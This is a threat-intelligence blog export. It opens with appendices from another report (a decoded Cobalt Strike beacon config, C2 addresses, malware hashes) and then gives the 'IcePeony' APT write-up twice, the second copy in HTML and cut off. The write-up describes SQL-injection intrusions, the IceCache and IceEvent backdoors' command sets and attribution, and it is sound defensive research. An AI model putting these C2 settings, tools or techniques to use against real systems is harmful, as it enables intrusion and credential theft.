normal;">toupper(to_hex("lklzndaawijhd")) + zero padding</td> <td style="word-wrap: break-word; white-space: normal;">70b3b8e07752c1f3d4a462b2ab47ca3d9fb5094131971067230031b8b2cd84f2</td> <td style="word-wrap: break-word; white-space: normal;">CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">99d6b73b1a9e66d7f6dcb3244ea0783b60776efd223d95c4f95e31fde434e258</td> <td style="word-wrap: break-word; white-space: normal;">Old</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("ifovxtgokm|yzjwz"))</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> </tr> </tbody> </table> <h4>Appendix C：Cobalt Strikeのコンフィグの例</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> BeaconType - HTTPS Port - 443 SleepTime - 30000 MaxGetSize - 2097328 Jitter - 40 MaxDNS - Not Found PublicKey_MD5 - d67a7903c6777d64b69845b6fcd5db65 C2Server - 64.95.10[.]209,/Collector/2.0/settings/,179.60.149[.]209,/Collector/2.0/settings/,64.52.80[.]62,/Collector/2.0/settings/ UserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Teams/1.4.00.2879 Chrome/80.0.3987.165 Electron/8.5.1 Safari/537.36 HttpPostUri - /MkuiIJzM2IZs Malleable_C2_Instructions - Remove 46 bytes from the end Remove 130 bytes from the beginning NetBIOS decode 'a' HttpGet_Metadata - ConstHeaders Accept: json Host: westeurope-teams.azureedge.net Referer: https://teams.microsoft.com/_ x-ms-session-id: f73c3186-057a-d996-3b63-b6e5de6ef20c x-ms-client-type: desktop x-mx-client-version: 27/1.0.0.2021020410 Accept-Encoding: gzip, deflate, br Origin: https://teams.microsoft.com ConstParams qsp=true client-id=NO_AUTH sdk-version=ACT-Web-JS-2.5.0& Metadata base64url parameter "events" HttpPost_Metadata - ConstHeaders Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 SessionId base64url parameter "id" Output base64url print PipeName - Not Found DNS_Idle - Not Found DNS_Sleep - Not Found SSH_Host - Not Found SSH_Port - Not Found SSH_Username - Not Found SSH_Password_Plaintext - Not Found SSH_Password_Pubkey - Not Found SSH_Banner - HttpGet_Verb - GET HttpPost_Verb - POST HttpPostChunk - 0 Spawnto_x86 - %windir%\syswow64\powercfg.exe Spawnto_x64 - %windir%\sysnative\powercfg.exe CryptoScheme - 0 Proxy_Config - Not Found Proxy_User - Not Found Proxy_Password - Not Found Proxy_Behavior - Use IE settings Watermark_Hash - NtZOV6JzDr9QkEnX6bobPg== Watermark - 987654321 bStageCleanup - True bCFGCaution - True KillDate - 0 bProcInject_StartRWX - True bProcInject_UseRWX - False bProcInject_MinAllocSize - 8096 ProcInject_PrependAppend_x86 - Empty ProcInject_PrependAppend_x64 - Empty ProcInject_Execute - ntdll.dll:RtlUserThreadStart NtQueueApcThread-s SetThreadContext CreateRemoteThread kernel32.dll:LoadLibraryA RtlCreateUserThread ProcInject_AllocationMethod - VirtualAllocEx bUsesCookies - False HostHeader - headersToRemove - Not Found DNS_Beaconing - Not Found DNS_get_TypeA - Not Found DNS_get_TypeAAAA - Not Found DNS_get_TypeTXT - Not Found DNS_put_metadata - Not Found DNS_put_output - Not Found DNS_resolver - Not Found DNS_strategy - round-robin DNS_strategy_rotate_seconds - -1 DNS_strategy_fail_x - -1 DNS_strategy_fail_seconds - -1 Retry_Max_Attempts - 0 Retry_Increase_Attempts - 0 Retry_Duration - 0 </pre> <h4>Appendix D：Network</h4> <ul> <li>64.52.80[.]62:443</li> <li>64.95.10[.]209:443</li> <li>67.217.228[.]55:443</li> <li>137.184.155[.]92:443</li> <li>159.65.241[.]37:443</li> <li>162.33.179[.]247:8443</li> <li>165.227.113[.]183:443</li> <li>179.60.149[.]209:443</li> <li>192.241.190[.]181:443</li> <li>api.glazeceramics[.]com:443</li> <li>doc.docu-duplicator[.]com:53</li> <li>doc2.docu-duplicator[.]com:53</li> <li>comdoc1.docu-duplicator[.]com:53</li> </ul> <h4>Appendix E：マルウェア</h4> 表2 マルウェア・ツール一覧 <table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 15%;"> <col style="width: 15%;"> <col style="width: 70%;"> </colgroup> <thead> <tr> <th>Malware</th> <th>Filename</th> <th>Hash(SHA256)</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">java(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">java.exe</td> <td style="word-wrap: break-word; white-space: normal;">16b1819186f0803b9408d9a448a176142f8271a4bc0b42cdb78eb4489bce16fe</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">56b941f6dcb769ae6d6995412559012abab830f05d5d8acf2648f7fa48c20833</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">dfe79b9c57cfb9fc10597b43af1c0a798991b6ceeec2af9b1e0ed46e6a8661c8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">3f96b6589996e57abc1c4d9b732528d2d11dea5c814f8241170c14ca2cd0281d</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">0ab709728666f8759ad8db574d4009cf74ebce36ef2572ef52b058997a9b2a25</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">ecca3194613b0bab02059c3544fdc90f6d4af5a4c06518c853517eb1d81b9735</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">ad90a4490d82c7bd300fdbbdca0336e5ad2219d63ea0f08cebc33050d65b7ef2</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">99d6b73b1a9e66d7f6dcb3244ea0783b60776efd223d95c4f95e31fde434e258</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">6246fb5c8b714707ac49ade53e6fe5017d96442db393b1c0ba964698ae24245d</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">acdf2a87ed03f2c6fe1d9899e8a74e8b56f7b77bb8aed5adf2cc374ee5465168</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">6b80d602472c76b1d0f05bcce62e0a34de758232d9d570ba61b540784c663c01</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">3079a29575a0adff91f04c5493a7f3e1c89795e3a90cf842650cd8bd45c4e1bc</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">70b3b8e07752c1f3d4a462b2ab47ca3d9fb5094131971067230031b8b2cd84f2</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">CrossC2</td> <td style="word-wrap: break-word; white-space: normal;">gds</td> <td style="word-wrap: break-word; white-space: normal;">28d668f3e1026a56d55bc5d6e36fad71622c1ab20ace52d3ab12738f9f8c6589</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">CrossC2</td> <td style="word-wrap: break-word; white-space: normal;">gss</td> <td style="word-wrap: break-word; white-space: normal;">9e8c550545aea5212c687e15399344df8a2c89f8359b90d8054f233a757346e7</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ELF-SystemBC</td> <td style="word-wrap: break-word; white-space: normal;">monitor</td> <td style="word-wrap: break-word; white-space: normal;">74a33138ce1e57564baa4ea4db4a882d6bf51081b79a167a6cb2bf9130ddad7f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ELF-SystemBC</td> <td style="word-wrap: break-word; white-space: normal;">monitor</td> <td style="word-wrap: break-word; white-space: normal;">7ccff87db7b4e6bc8c5a7e570f83e26ccb6f3a8f72388210af466048d3793b00</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">GetNPUsers</td> <td style="word-wrap: break-word; white-space: normal;">GetNPUsers_windows.exe</td> <td style="word-wrap: break-word; white-space: normal;">e0e827198a70eef6c697559660106cfab7229483b0cd7f0c7abd384a3d2ee504</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Tools related to privilege escalation</td> <td style="word-wrap: break-word; white-space: normal;">wermgr.exe</td> <td style="word-wrap: break-word; white-space: normal;">f79e047ae4834e6a9234ca1635f18b074a870b366fe4368c10c2ddc56dfbb1bc</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Tools related to privilege escalation</td> <td style="word-wrap: break-word; white-space: normal;">wermgr.exe</td> <td style="word-wrap: break-word; white-space: normal;">ac02aee660d44a8bfbc69e9c46cf402fd41e99915e13d0de3977e662ef13b2ca</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Plink v0.81</td> <td style="word-wrap: break-word; white-space: normal;">conhost.exe</td> <td style="word-wrap: break-word; white-space: normal;">2e338a447b4ceaa00b99d742194d174243ca82830a03149028f9713d71fe9aab</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">PsExec v2.43</td> <td style="word-wrap: break-word; white-space: normal;">PsExec.exe</td> <td style="word-wrap: break-word; white-space: normal;">078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">cab関連ツール</td> <td style="word-wrap: break-word; white-space: normal;">hhupd.exe</td> <td style="word-wrap: break-word; white-space: normal;">d74eac55eeaa3138bc1e723c56013bb1af7709f0a77308bfbf268d4e32b37243</td> </tr> </tbody> </table>
IcePeony with the ‘996’ work culture

Wed, 16 Oct 2024 15:00:00 -0000

This blog post is based on “IcePeony with the ‘996’ work culture” that we presented at VB2024. We are grateful to Virus Bulletin for giving us the opportunity to present. https://www.virusbulletin.com/conference/vb2024/abstracts/icepeony-996-work-culture/ tl;dr We have discovered a previously unknown China-nexus APT group, which we have named “IcePeony”. Due to operational mistakes, they exposed their resources, allowing us to uncover details of their attacks. IcePeony is a China-nexus APT group that has been active since at least 2023. They have targeted government agencies, academic institutions, and political organizations in countries such as India, Mauritius, and Vietnam. Their attacks typically start with SQL Injection, followed by compromise via webshells and backdoors. Interestingly, they use a custom IIS malware called “IceCache”. Through extensive analysis, we strongly believe that IcePeony is a China-nexus APT group, operating under harsh work conditions. IcePeony IcePeony is an unknown attack group. Our research shows that they have been active since at least 2023. They mainly target Asian countries, such as India and Vietnam. In the log files we analyzed, there were over 200 attempts to attack various government websites in India. They use SQL injection attacks on public web servers. If they find a vulnerability, they install a webshell or malware. Ultimately, their goal is to steal credentials. We believe IcePeony works for China’s national interests. It is possible that they prioritize China’s maritime strategy. Our research found that IcePeony targeted government and academic institutions in India, political parties in Vietnam, and government institutions in Mauritius. Recently, they may have also attacked Brazil. It is likely that they will expand their targets in the future. OPSEC fail In July, we identified a host that was publicly exposing various attack tools, including CobaltStrike and sqlmap, via an open directory. What made this discovery even more compelling was the presence of a zsh_history file. One of the most interesting findings was the zsh_history file. Similar to bash_history, the zsh_history file records command history. However, zsh_history also logs timestamps, allowing us to pinpoint the exact time each command was executed. This enabled us to construct a highly detailed timeline of the attack. Unlike a typical timeline created by an IR or SOC analyst, this one offers insight from the attacker’s perspective. We could observe their trial-and-error process and how they executed the intrusion. The zsh_history was not the only interesting file. There were many others. For example, IcePeony had configured several helper commands in their alias file, including shortcuts to simplify lengthy commands and commands to quickly access help information. Here is an example with Mimikatz. By typing “hPass,” the attacker could display basic tutorials for Mimikatz. This improved their effectiveness during attacks. Intrusion Timeline We obtained two weeks’ worth of command history from the zsh_history. Let’s go through the events of each day. On day-1, the attacker attempted SQL injections on several government websites. When the exploit succeeded, they installed a webshell or IceCache, establishing a foothold for the attack. On day-2, they reviewed the domain information of compromised hosts and created accounts for further exploitation. On day three, which was a Sunday, no actions were taken. On day-3, which was a Sunday, they did not perform any actions. It seems the attacker does not work on Sundays. On day-4, they used IceCache to configure proxy rules. We will explain this in more detail later. On day-5, the attacker expanded their reach by attempting more SQL injections on other government websites. On day-6, they used various tools, including IcePeony’s custom tool called StaX and a rootkit called Diamorphine. On day-7, they continued to attack other hosts using tools like URLFinder and sqlmap. On day-8, they used IceCache to steal information from the compromised environment, especially focusing on domain users. On day-9, they were quiet and only performed connection checks. On day-10, they did nothing since it was a Sunday. On day-11, they used tools like craXcel and WmiExec. They used craXcel, an open-source tool, to unlock password-protected Microsoft Office files. On day-12, they used IceCache to add proxy rules and set persistence with scheduled tasks. On day-13 and day-14, they explored other hosts for further exploitation. Over the course of two weeks, the attacker utilized a variety of tools and commands to compromise government websites and exfiltrate information. Tools IcePeony uses a wide range of tools, with a particular preference for open-source ones. Here, we will highlight only the most distinctive tools they use. StaX StaX is a customized variant of the open-source tool Stowaway, a high-performance proxy tool. The attacker enhanced Stowaway with custom processing. Based on development strings, we called this version StaX. StaX included encryption for communication targets specified in active mode using Custom Base64 and AES. ProxyChains ProxyChains is an open-source proxy tool. The attacker used ProxyChains to run script files on victim hosts. info.sh is a script that collects system information from the compromised environment. It gathers environment information, user information, installed tool versions, network settings, SSH configuration files, and command history. linux_back.sh is a script for backdoors and persistence. It downloads and runs a backdoor shell script from the server and creates backdoor users. Interestingly, they installed a rootkit called Diamorphine, which is available on GitHub. Malware The IcePeony server contained malware targeting IIS, which we named IceCache. They used IceCache to attack the attack surface server. Additionally, during the investigation, we discovered another related malware, which we called IceEvent. Although no logs of using IceEvent were found. We believe it was used to compromise another computer that was not connected to the internet. IceCache IceCache is an ELF64 binary developed in Go language. It is customized based on the open-source software reGeorge. To facilitate their intrusion operations, they added file transmission commands and command execution functionality. IceCache module is installed and run on IIS servers. The number of commands change, but they are classified into two types based on authentication tokens. We found files with remaining PDB information. These files were developed by a user named “power” in a project called “cachsess” PDB Path C:\Users\power\documents\visual studio 2017\Projects\cachsess\x64\Release\cachsess.pdb C:\Users\power\Documents\Visual Studio 2017\Projects\cachsess\Release\cachsess32.pdb The number of commands changes over time, but it includes command execution functions, SOCKS proxy functions, and file transmission functions. TYPE-A Description EXEC / EXEC_PRO Command to the execution of a process SOCKS_HELLO Command to SOCKS protocol initial handshake message SOCKS_CONNECT Command to indicate a connection request with the SOCKS protocol SOCKS_DISCONNECT Command to indicate disconnection with SOCKS protocol SOCKS_READ Command to reading of data in SOCKS protocol SOCKS_FORWARD Command to instruct data transfer via SOCKS protocol PROXY_ADD Command to add a proxy PROXY_LIST Command to list a proxy PROXY_DEL Command to del a proxy PROXY_CLEAR Command to clear all proxy settings PROXY_SET_JS Set the JavaScript PROXY_GET_JS Get set the JavaScript PROXY_ALLOW_PC Allowed PC settings PROXY_CACHE_CLEAR Command to clear the proxy cache PROXY_CACHE_TIME Command to set proxy cache time FILE_UPLOAD Upload Files FILE_DOWNLOAD Download Files TYPE-B Description EXEC / EXEC_PRO Command that directs the execution of a process SOCKS_HELLO SOCKS protocol initial handshake message SOCKS_CONNECT Command to indicate a connection request with the SOCKS protocol SOCKS_DISCONNECT Command to indicate disconnection with SOCKS protocol SOCKS_READ Command that directs reading of data in SOCKS protocol SOCKS_FORWARD Command to instruct data transfer via SOCKS protocol PROXY_ADD Command to add a proxy PROXY_LIST Command to list a proxy PROXY_DEL Command to del a proxy PROXY_CLEAR Command to clear all proxy settings FILE_UPLOAD / FILE_UPLOAD_PRO Upload Files FILE_DOWNLOAD / FILE_DOWNLOAD_PRO Download Files IIS_VERSION Show IIS version These are the IceCache modules found so far. The first sample we are aware of was compiled in August 2023 and submitted to VirusTotal in October. Since there is no discrepancy between the compille time and the first submission, we believe the dates are reliable. Many new samples have also been found since 2024. Most of the submitters are from India, which matches the victim information we have gathered from OpenDir data. The number of commands has change over time. It is show that the malware’s developers have made improvements while continuing their intrusion operations. sha256[:8] Compile Time First Submission Submitter Cmd Num X-Token TYPE 5b16d153 2024-07-17 09:11:14 2024-08-03 04:58:20 c8d0b2b9 (ID) 20 tn7rM2851XVvOFbc B 484e2740 2024-06-21 03:05:15 2024-08-07 09:25:53 39d4d6d2 - email 20 tn7rM2851XVvOFbc B 11e90e24 2024-06-05 03:52:48 2024-06-18 12:21:50 d9cb313c (ID) 20 tn7rM2851XVvOFbc B b8d030ed 2024-06-05 03:52:41 2024-06-18 10:47:18 408f1927 (ID) 20 tn7rM2851XVvOFbc B ceb47274 2024-04-25 09:53:26 2024-08-02 21:50:50 06ac9f47 (BR) 20 tn7rM2851XVvOFbc B d1955169 2024-04-21 11:29:25 2024-06-18 12:24:39 d9cb313c (ID) 18 tn7rM2851XVvOFbc B de8f58f0 2024-04-21 11:29:10 2024-06-18 10:49:53 408f1927 (ID) 18 tn7rM2851XVvOFbc B 53558af 2024-03-27 05:08:50 2024-04-19 07:57:19 c2440bbf (ID) 18 tn7rM2851XVvOFbc B 0b8b10a2 2024-03-27 05:08:57 2024-04-18 13:54:16 c2440bbf (ID) 18 tn7rM2851XVvOFbc B a66627cc 2024-02-20 09:36:12 2024-03-12 15:17:55 a6412166 (VN) 16 cbFOvVX1582Mr7nt A e5f520d9 2024-02-01 09:32:21 2024-07-17 09:30:54 24761b38 (SG) 24 cbFOvVX1582Mr7nt A 3eb56218 2023-12-07 03:04:16 2024-02-20 13:54:02 0f09a1ae (ID) 24 cbFOvVX1582Mr7nt A 5fd5e99f 2023-09-27 00:50:46 2024-03-24 08:59:02 Ca43fb0f (ID) 24 cbFOvVX1582Mr7nt A 0eb60e4c 2023-08-23 09:11:24 2023-10-18 10:11:00 0e8f2a34 (VN) 18 cbFOvVX1582Mr7nt A IceEvent IceEvent is a simple passive-mode backdoor that installed as a service. PDB Path C:\Users\power\Documents\Visual Studio 2017\Projects\WinService\x64\Release\WinService.pdb Two types have been identified based on the command format. Both types only have the minimum necessary commands. The older type was discovered in September 2023, and several new types were found in April of this year. All of these were submitted from India. TYPE-A Description FILE: Command to Reading files via sockets CMD: Command to the execution of a process TYPE-B Description UPFILE Upload Files DOWNFILE Download Files CMD Command to the execution of a process sha256[:8] Compile Time First Submission Submitter Cmd Num TYPE 80e83118 2024-04-25 09:50:58 2024-07-25 05:43:08 INDIA (99003aca) 3 B 9aba997b 2024-04-30 04:48:48 2024-06-14 05:46:49 INDIA (060734bd) 3 B 9a0b0439 2024-04-25 09:50:58 2024-06-14 05:00:08 INDIA (060734bd) 3 B bc94da1a 2023-08-23 08:52:46 2023-09-05 03:03:57 INDIA (81f8b666) 2 A Similarities We believe that IceEvent was developed because a simple passive backdoor was needed during intrusions, based on code similarities with IceCache. Both IceCache and IceEvent use the same key for XOR to encode communication data. And PDB information shows that the same developer created both malware. This is the XOR-based data encoding process used for communication data, which is equal to both malware. This is the command execution process equal to both malware. Since the function calls and branching processes are exactly the same, we believe they were compiled from the same source code. Other commands also match perfectly. The communication data of IceCache and IceEvent is only encoded using the XOR process mentioned earlier, making it easy to decode. Here is an example of decoding the data during command execution. Attribution We investigated the attacker’s activity times based on the timestamp information in the zsh_history file. As a result, we found that the attacker is likely operating in the UTC+8 time zone. Surprisingly, the attacker works from 8 a.m. to 10 p.m., which is a 14-hour workday. They are remarkably diligent workers. Similarly, we investigated the changes in activity based on the day of the week. It seems that the attackers work six days a week. While they are less active on Fridays and Saturdays, their only full day off appears to be Sunday. This investigation suggests that the attackers are not conducting these attacks as personal activities, but are instead engaging in them as part of organized, professional operations. By the way, have you heard of the term “996 working hour system”? This term originated in China’s IT industry. In China’s IT industry, long working hours see as a problem. It refers to working from 9 a.m. to 9 p.m.,six days a week. Such hard work conditions are called the “996 working hour system”. IcePeony might be working under the 996 working hour system. https://en.wikipedia.org/wiki/996_working_hour_system Next, There is a very simple example to consider when discussing attribution. IcePeony sometimes includes Simplified Chinese comments in the tools they use. Here, we provide an example of a wrapper script for the IceCache Client. From this, we can conclude that IcePeony is a threat actor from a region where Simplified Chinese is commonly used. IcePeony uses an original malware called IceCache. As previously mentioned, IceCache is based on reGeorge. More specifically, IceCache contains a string referring to a project named reGeorgGo. Upon investigating reGeorgGo, We found that it was developed by a Chinese security engineer. There is no other information about this project on the internet, aside from the developer’s blog. It was a not well-known tool. However, the publicly available reGeorgGo is a tool with only three arguments, where as IceCache has more commands added to it. https://github.com/zz1gg/secdemo/tree/main/proxy/reGeorgGo Let’s examine attribution from another side. In this attack campaign, IcePeony targeted India, Mauritius, and Vietnam. While attacks on India and Vietnam are generally not uncommon. What about Mauritius? Mauritius is a small country located in the Indian Ocean. Interestingly, Mauritius has recently formed a cooperation with India. They are wary of China’s expansion into the Indian Ocean and have begun various forms of collaboration to counter this influence. https://www.mea.gov.in/newsdetail1.htm?12042/ We summarize the attribution information using the Diamond Model. IcePeony consists of Simplified Chinese speakers who show interest in the governments of Indian Ocean countries and work under the 996 working hour system. They prefer open-source software developed in Chinese-speaking regions and use their original malware, IceCache and IceEvent. In attacks on the Indian government, they used VPSs located in the Indian region. Additionally, the governments and education sectors in Mauritius and Vietnam were also targeted. Wrap-Up In this blog post, we introduced IcePeony. IcePeony is a newly emerging attack group. Our investigation shows that they have been active since at least 2023. Their primary targets are countries in Asia, such as India and Vietnam. The log files we analyzed recorded attempts to attack over 200 different Indian government websites. IcePeony typically attempts SQL Injection attacks on publicly accessible web servers. If vulnerabilities are found, they install web shells or execute malware. Ultimately, they aim to steal credentials. We suspect that IcePeony operates as a group of individuals conducting cyberattacks in support of China’s national interests, possibly in connection with China’s maritime strategy. They remain active, and we must continue monitoring their activities closely moving forward. IoCs IP 165[.]22.211.62 64[.]227.133.248 173[.]208.156.19 173[.]208.156.144 154[.]213.17.225 103[.]150.186.219 63[.]141.255.16 204[.]12.205.10 107[.]148.37.63 103[.]99.60.119 154[.]213.17.237 45[.]195.205.88 154[.]213.17.244 103[.]99.60.93 149[.]115.231.17 149[.]115.231.39 103[.]99.60.108 Domain d45qomwkl[.]online k9ccin[.]com k8ccyn[.]com 88k8cc[.]com googlesvn[.]com IceCache 484e274077ab6f9354bf71164a8edee4dc4672fcfbf05355958785824fe0468f 5b16d1533754c9e625340c4fc2c1f76b11f37eb801166ccfb96d2aa02875a811 ceb47274f4b6293df8904c917f423c2f07f1f31416b79f3b42b6d64e65dcfe1b e5f520d95cbad6ac38eb6badbe0ad225f133e0e410af4e6df5a36b06813e451b d1955169cd8195ecedfb85a3234e4e6b191f596e493904ebca5f44e176f3f950 11e90e2458a97957064a3d3f508fa6dadae19f632b45ff9523b7def50ebacb63 de8f58f008ddaa60b5cf1b729ca03f276d2267e0a80b584f2f0723e0fac9f76c b8d030ed55bfb6bc4fdc9fe34349ef502561519a79166344194052f165d69681 535586af127e85c5561199a9a1a3254d554a6cb97200ee139c5ce23e68a932bd 0b8b10a2ff68cb2aa3451eedac4a8af4bd147ef9ddc6eb84fc5b01a65fca68fd 5fd5e99fc503831b71f4072a335f662d1188d7bc8ca2340706344fb974c7fe46 3eb56218a80582a79f8f4959b8360ada1b5e471d723812423e9d68354b6e008c a66627cc13f827064b7fcea643ab31b34a7cea444d85acc4e146d9f2b2851cf6 0eb60e4c5dc7b06b719e9dbd880eb5b7514272dc0d11e4760354f8bb44841f77 IceEvent 80e831180237b819e14c36e4af70304bc66744d26726310e3c0dd95f1740ee58 9a0b0439e6fd2403f764acf0527f2365a4b9a98e9643cd5d03ccccf3825a732e 9aba997bbf2f38f68ad8cc3474ef68eedd0b99e8f7ce39045f1d770e2af24fea bc94da1a066cbb9bdee7a03145609d0f9202b426a52aca19cc8d145b4175603b

<img src="https://nao-sec.org/assets/2024-10-17/top.png" alt="" /> This blog post is based on “IcePeony with the ‘996’ work culture” that we presented at VB2024. We are grateful to Virus Bulletin for giving us the opportunity to present. <a href="https://www.virusbulletin.com/conference/vb2024/abstracts/icepeony-996-work-culture/">https://www.virusbulletin.com/conference/vb2024/abstracts/icepeony-996-work-culture/</a> <h2 id="tldr">tl;dr</h2> We have discovered a previously unknown China-nexus APT group, which we have named “IcePeony”. Due to operational mistakes, they exposed their resources, allowing us to uncover details of their attacks. <ul> <li>IcePeony is a China-nexus APT group that has been active since at least 2023. They have targeted government agencies, academic institutions, and political organizations in countries such as India, Mauritius, and Vietnam.</li> <li>Their attacks typically start with SQL Injection, followed by compromise via webshells and backdoors. Interestingly, they use a custom IIS malware called “IceCache”.</li> <li>Through extensive analysis, we strongly believe that IcePeony is a China-nexus APT group, operating under harsh work conditions.</li> </ul> <h2 id="icepeony">IcePeony</h2> IcePeony is an unknown attack group. Our research shows that they have been active since at least 2023. They mainly target Asian countries, such as India and Vietnam. In the log files we analyzed, there were over 200 attempts to attack various government websites in India. They use SQL injection attacks on public web servers. If they find a vulnerability, they install a webshell or malware. Ultimately, their goal is to steal credentials. We believe IcePeony works for China’s national interests. It is possible that they prioritize China’s maritime strategy. <img src="https://nao-sec.org/assets/2024-10-17/1.png" alt="" /> Our research found that IcePeony targeted government and academic institutions in India, political parties in Vietnam, and government institutions in Mauritius. Recently, they may have also attacked Brazil. It is likely that they will expand their targets in the future. <h2 id="opsec-fail">OPSEC fail</h2> In July, we identified a host that was publicly exposing various attack tools, including CobaltStrike and sqlmap, via an open directory. What made this discovery even more compelling was the presence of a zsh_history file. <img src="https://nao-sec.org/assets/2024-10-17/2.png" width="60%" /> One of the most interesting findings was the zsh_history file. Similar to bash_history, the zsh_history file records command history. However, zsh_history also logs timestamps, allowing us to pinpoint the exact time each command was executed. This enabled us to construct a highly detailed timeline of the attack. Unlike a typical timeline created by an IR or SOC analyst, this one offers insight from the attacker’s perspective. We could observe their trial-and-error process and how they executed the intrusion. <img src="https://nao-sec.org/assets/2024-10-17/3.png" alt="" /> The zsh_history was not the only interesting file. There were many others. For example, IcePeony had configured several helper commands in their alias file, including shortcuts to simplify lengthy commands and commands to quickly access help information. Here is an example with Mimikatz. By typing “hPass,” the attacker could display basic tutorials for Mimikatz. This improved their effectiveness during attacks. <img src="https://nao-sec.org/assets/2024-10-17/4.png" alt="" /> <h2 id="intrusion-timeline">Intrusion Timeline</h2> We obtained two weeks’ worth of command history from the zsh_history. Let’s go through the events of each day. <img src="https://nao-sec.org/assets/2024-10-17/5.png" alt="" /> On day-1, the attacker attempted SQL injections on several government websites. When the exploit succeeded, they installed a webshell or IceCache, establishing a foothold for the attack. On day-2, they reviewed the domain information of compromised hosts and created accounts for further exploitation. On day three, which was a Sunday, no actions were taken. On day-3, which was a Sunday, they did not perform any actions. It seems the attacker does not work on Sundays. On day-4, they used IceCache to configure proxy rules. We will explain this in more detail later. On day-5, the attacker expanded their reach by attempting more SQL injections on other government websites. On day-6, they used various tools, including IcePeony’s custom tool called StaX and a rootkit called Diamorphine. On day-7, they continued to attack other hosts using tools like URLFinder and sqlmap. <img src="https://nao-sec.org/assets/2024-10-17/6.png" alt="" /> On day-8, they used IceCache to steal information from the compromised environment, especially focusing on domain users. On day-9, they were quiet and only performed connection checks. On day-10, they did nothing since it was a Sunday. On day-11, they used tools like craXcel and WmiExec. They used craXcel, an open-source tool, to unlock password-protected Microsoft Office files. On day-12, they used IceCache to add proxy rules and set persistence with scheduled tasks. On day-13 and day-14, they explored other hosts for further exploitation. Over the course of two weeks, the attacker utilized a variety of tools and commands to compromise government websites and exfiltrate information. <h2 id="tools">Tools</h2> IcePeony uses a wide range of tools, with a particular preference for open-source ones. Here, we will highlight only the most distinctive tools they use. <h3 id="stax">StaX</h3> StaX is a customized variant of the open-source tool Stowaway, a high-performance proxy tool. The attacker enhanced Stowaway with custom processing. Based on development strings, we called this version StaX. <img src="https://nao-sec.org/assets/2024-10-17/9.png" width="70%" /> StaX included encryption for communication targets specified in active mode using Custom Base64 and AES. <img src="https://nao-sec.org/assets/2024-10-17/7.png" alt="" /> <img src="https://nao-sec.org/assets/2024-10-17/8.png" alt="" /> <h3 id="proxychains">ProxyChains</h3> ProxyChains is an open-source proxy tool. The attacker used ProxyChains to run script files on victim hosts. <img src="https://nao-sec.org/assets/2024-10-17/10.png" alt="" /> info.sh is a script that collects system information from the compromised environment. It gathers environment information, user information, installed tool versions, network settings, SSH configuration files, and command history. linux_back.sh is a script for backdoors and persistence. It downloads and runs a backdoor shell script from the server and creates backdoor users. Interestingly, they installed a rootkit called Diamorphine, which is available on GitHub. <img src="https://nao-sec.org/assets/2024-10-17/11.png" alt="" /> <h2 id="malware">Malware</h2> The IcePeony server contained malware targeting IIS, which we named IceCache. They used IceCache to attack the attack surface server. Additionally, during the investigation, we discovered another related malware, which we called IceEvent. Although no logs of using IceEvent were found. We believe it was used to compromise another computer that was not connected to the internet. <img src="https://nao-sec.org/assets/2024-10-17/12.png" alt="" 